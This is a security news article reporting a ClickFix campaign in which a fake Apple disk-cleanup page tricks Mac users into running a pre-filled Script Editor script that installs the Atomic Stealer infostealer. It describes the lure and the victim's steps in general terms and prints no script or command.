Recent findings by security researchers reveal a new ClickFix attack vector specifically targeting Mac users through a fraudulent Apple-themed webpage. This malicious site falsely claims to provide instructions on how to reclaim disk space on a Mac, luring unsuspecting victims into executing harmful commands.

The ClickFix technique is a form of social engineering that deceives users into executing malicious commands on their devices, often under the pretense of resolving issues or performing routine maintenance tasks. Initially directed at Windows users, this technique has increasingly targeted macOS and Linux systems as well.

Researchers have observed that the primary method for ClickFix attacks on macOS involved convincing users to copy and paste harmful commands into the Terminal application, a practice that Apple sought to mitigate with the introduction of a new security feature in macOS 26.4. This feature scans commands before they are executed, prompting attackers to adapt their strategies.

In response, cybercriminals have shifted their tactics to exploit a browser-triggered workflow, which allows them to launch the Script Editor, a pre-installed code editor on macOS designed for AppleScript and JavaScript for Automation. This approach facilitates the execution of malicious scripts without direct interaction with the Terminal.

The Mechanics of the Attack

From the perspective of a victim, the attack unfolds in several steps:

• Users visit the deceptive webpage and follow its misleading instructions.
• They click on the “Execute” button provided on the site.
• A prompt appears, requesting permission for the website to open Script Editor.
• Upon approval, Script Editor opens, pre-filled with the malicious script crafted by the attackers.
• Depending on their macOS version, users may see a warning about executing the script.
• If they disregard the warning and permit the script to run, it will discreetly download and execute a variant of the Atomic Stealer malware, also known as AMOS.

Atomic Stealer is a subscription-based malware product marketed to criminals, allowing them to harvest sensitive information from infected systems. This malware is capable of collecting a wide range of data, including system details, credentials stored in Keychain (Apple's password management system), autofill data, passwords, cookies, and credit card information from web browsers, as well as data from cryptocurrency wallets.

In light of these developments, researchers from Jamf have shared various indicators of compromise to help identify infections linked to this malware delivery campaign. Users are urged to remain vigilant and exercise caution when interacting with unknown websites, especially those claiming to offer system fixes or enhancements.

As cyber threats continue to evolve, it is crucial for users to stay informed about the latest tactics employed by attackers. Subscribing to security alerts can help ensure that individuals are aware of potential risks and can take proactive measures to protect their data and devices.

Source: Help Net Security News